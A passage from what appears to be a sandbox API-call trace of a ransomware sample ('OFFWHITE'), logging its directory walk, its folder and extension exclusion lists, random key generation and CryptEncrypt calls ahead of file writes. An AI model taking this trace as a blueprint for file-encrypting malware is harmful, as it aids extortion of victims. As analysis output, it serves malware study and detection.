dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.595] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.595] GetProcessHeap () returned 0x500000 [0146.595] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0146.595] GetProcessHeap () returned 0x500000 [0146.595] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0146.595] GetProcessHeap () returned 0x500000 [0146.595] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0146.595] GetProcessHeap () returned 0x500000 [0146.595] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0146.595] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.595] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.596] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0146.596] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.596] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.596] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0146.596] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.596] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.596] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.596] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.596] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.596] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.596] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.596] SetLastError (dwErrCode=0x0) [0146.596] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55fc80, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.596] GetLastError () returned 0x6 [0146.596] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xbafd7360, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xe3866f30, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0146.596] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0146.597] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbafd7360, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbafd7360, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="StateData", cAlternateFileName="STATED~1")) returned 1 [0146.597] lstrcmpiW (lpString1="StateData", lpString2=".") returned 1 [0146.597] lstrcmpiW (lpString1="StateData", lpString2="..") returned 1 [0146.597] lstrcmpiW (lpString1="StateData", lpString2="...") returned 1 [0146.597] lstrcmpiW (lpString1="StateData", lpString2="windows") returned -1 [0146.597] lstrcmpiW (lpString1="StateData", lpString2="$recycle.bin") returned 1 [0146.597] lstrcmpiW (lpString1="StateData", lpString2="rsa") returned 1 [0146.597] lstrcmpiW (lpString1="StateData", lpString2="ntuser.dat") returned 1 [0146.597] lstrcmpiW (lpString1="StateData", lpString2="programdata") returned 1 [0146.597] lstrcmpiW (lpString1="StateData", lpString2="appdata") returned 1 [0146.597] lstrcmpiW (lpString1="StateData", lpString2="program files") returned 1 [0146.597] lstrcmpiW (lpString1="StateData", lpString2="program files (x86)") returned 1 [0146.597] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\" [0146.597] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\", lpString2="StateData" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData") returned="C:/Users\\All Users\\Microsoft\\RAC\\StateData" [0146.597] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\" [0146.597] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\" [0146.597] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\*.*") returned="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\*.*" [0146.597] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbafd7360, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbafd7360, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0146.597] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.597] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbafd7360, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbafd7360, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0146.597] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.597] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.597] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb35800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xecb35800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe3012230, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="RacDatabase.sdf", cAlternateFileName="RACDAT~1.SDF")) returned 1 [0146.597] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2=".") returned 1 [0146.598] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="..") returned 1 [0146.598] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="...") returned 1 [0146.598] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="windows") returned -1 [0146.598] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="$recycle.bin") returned 1 [0146.598] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="rsa") returned -1 [0146.598] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="ntuser.dat") returned 1 [0146.598] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="programdata") returned 1 [0146.598] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="appdata") returned 1 [0146.598] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="program files") returned 1 [0146.598] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="program files (x86)") returned 1 [0146.598] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\" [0146.598] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\", lpString2="RacDatabase.sdf" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" [0146.598] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.598] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.598] PathFindExtensionW (pszPath="RacDatabase.sdf") returned=".sdf" [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".exe") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".log") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".cab") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".cmd") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".com") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".cpl") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".ini") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".dll") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".url") returned -1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".ttf") returned -1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".mp3") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".pif") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".mp4") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".OFFWHITE") returned 1 [0146.598] lstrcmpiW (lpString1=".sdf", lpString2=".msi") returned 1 [0146.598] lstrcmpiW (lpString1="RacDatabase.sdf", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.598] GetProcessHeap () returned 0x500000 [0146.599] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546f58 [0146.599] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.599] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.599] GetProcessHeap () returned 0x500000 [0146.599] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a28 [0146.599] GetProcessHeap () returned 0x500000 [0146.599] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a40 [0146.599] GetProcessHeap () returned 0x500000 [0146.599] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fe90 [0146.599] GetProcessHeap () returned 0x500000 [0146.599] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55ff98 [0146.599] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.599] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.599] SystemFunction036 (in: RandomBuffer=0x546a28, RandomBufferLength=0x10 | out: RandomBuffer=0x546a28) returned 1 [0146.599] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.599] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.599] SystemFunction036 (in: RandomBuffer=0x546a40, RandomBufferLength=0x10 | out: RandomBuffer=0x546a40) returned 1 [0146.599] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.599] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.599] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fe90*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x55fe90*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.600] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.600] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.600] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55ff98*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x55ff98*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.600] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.600] SetLastError (dwErrCode=0x0) [0146.600] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55fe90, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.600] GetLastError () returned 0x6 [0146.600] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0146.600] lstrcmpiW (lpString1="RacMetaData.dat", lpString2=".") returned 1 [0146.600] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="..") returned 1 [0146.600] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="...") returned 1 [0146.600] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="windows") returned -1 [0146.600] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="$recycle.bin") returned 1 [0146.600] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="rsa") returned -1 [0146.600] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="ntuser.dat") returned 1 [0146.600] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="programdata") returned 1 [0146.600] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="appdata") returned 1 [0146.600] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="program files") returned 1 [0146.601] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="program files (x86)") returned 1 [0146.601] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\" [0146.601] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\", lpString2="RacMetaData.dat" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat") returned="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" [0146.601] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.601] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.601] PathFindExtensionW (pszPath="RacMetaData.dat") returned=".dat" [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".cab") returned 1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".cmd") returned 1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".com") returned 1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".cpl") returned 1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".url") returned -1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".ttf") returned -1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".mp3") returned -1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".pif") returned -1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".mp4") returned -1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".OFFWHITE") returned -1 [0146.601] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0146.601] lstrcmpiW (lpString1="RacMetaData.dat", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0146.601] GetProcessHeap () returned 0x500000 [0146.601] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x546f68 [0146.602] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.602] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=-4251592508) returned 0 [0146.602] GetProcessHeap () returned 0x500000 [0146.602] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a58 [0146.602] GetProcessHeap () returned 0x500000 [0146.602] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a70 [0146.602] GetProcessHeap () returned 0x500000 [0146.602] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5600a0 [0146.602] GetProcessHeap () returned 0x500000 [0146.602] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5601a8 [0146.602] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.602] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.602] SystemFunction036 (in: RandomBuffer=0x546a58, RandomBufferLength=0x10 | out: RandomBuffer=0x546a58) returned 1 [0146.602] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.602] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.602] SystemFunction036 (in: RandomBuffer=0x546a70, RandomBufferLength=0x10 | out: RandomBuffer=0x546a70) returned 1 [0146.602] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.602] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.602] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5600a0*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x5600a0*, pdwDataLen=0x295d610*=0x100) returned 1 [0146.603] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.603] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.603] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5601a8*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x5601a8*, pdwDataLen=0x295d60c*=0x100) returned 1 [0146.603] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d8c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0146.603] SetLastError (dwErrCode=0x0) [0146.603] WriteFile (in: hFile=0xffffffff, lpBuffer=0x5600a0, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0) returned 0 [0146.603] GetLastError () returned 0x6 [0146.603] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 0 [0146.603] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0146.603] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb154120, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbb154120, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Temp", cAlternateFileName="")) returned 1 [0146.603] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0146.603] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0146.603] lstrcmpiW (lpString1="Temp", lpString2="...") returned 1 [0146.603] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0146.603] lstrcmpiW (lpString1="Temp", lpString2="$recycle.bin") returned 1 [0146.603] lstrcmpiW (lpString1="Temp", lpString2="rsa") returned 1 [0146.603] lstrcmpiW (lpString1="Temp", lpString2="ntuser.dat") returned 1 [0146.603] lstrcmpiW (lpString1="Temp", lpString2="programdata") returned 1 [0146.603] lstrcmpiW (lpString1="Temp", lpString2="appdata") returned 1 [0146.603] lstrcmpiW (lpString1="Temp", lpString2="program files") returned 1 [0146.603] lstrcmpiW (lpString1="Temp", lpString2="program files (x86)") returned 1 [0146.603] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\" [0146.603] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\", lpString2="Temp" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp") returned="C:/Users\\All Users\\Microsoft\\RAC\\Temp" [0146.603] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\" [0146.604] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\" [0146.604] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\*.*") returned="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\*.*" [0146.604] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb154120, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbb154120, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0146.604] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.604] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xbb154120, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbb154120, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0146.604] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.604] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.604] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb107e60, ftCreationTime.dwHighDateTime=0x1d62251, ftLastAccessTime.dwLowDateTime=0xbb107e60, ftLastAccessTime.dwHighDateTime=0x1d62251, ftLastWriteTime.dwLowDateTime=0xbb12dfc0, ftLastWriteTime.dwHighDateTime=0x1d62251, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x4a0048, dwReserved1=0x295e370, cFileName="sql9829.tmp", cAlternateFileName="")) returned 1 [0146.604] lstrcmpiW (lpString1="sql9829.tmp", lpString2=".") returned 1 [0146.604] lstrcmpiW (lpString1="sql9829.tmp", lpString2="..") returned 1 [0146.604] lstrcmpiW (lpString1="sql9829.tmp", lpString2="...") returned 1 [0146.604] lstrcmpiW (lpString1="sql9829.tmp", lpString2="windows") returned -1 [0146.604] lstrcmpiW (lpString1="sql9829.tmp", lpString2="$recycle.bin") returned 1 [0146.604] lstrcmpiW (lpString1="sql9829.tmp", lpString2="rsa") returned 1 [0146.604] lstrcmpiW (lpString1="sql9829.tmp", lpString2="ntuser.dat") returned 1 [0146.604] lstrcmpiW (lpString1="sql9829.tmp", lpString2="programdata") returned 1 [0146.604] lstrcmpiW (lpString1="sql9829.tmp", lpString2="appdata") returned 1 [0146.604] lstrcmpiW (lpString1="sql9829.tmp", lpString2="program files") returned 1 [0146.604] lstrcmpiW (lpString1="sql9829.tmp", lpString2="program files (x86)") returned 1 [0146.604] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\") returned="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\" [0146.604] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\", lpString2="sql9829.tmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\sql9829.tmp") returned="C:/Users\\All Users\\Microsoft\\RAC\\Temp\\sql9829.tmp" [0146.604] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0146.604] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0146.605] PathFindExtensionW (pszPath="sql9829.tmp") returned=".tmp" [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".exe") returned 1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".log") returned 1 [0146.605] lstrcmpiW (lpString1=".tmp", lpString2=".cab") returned 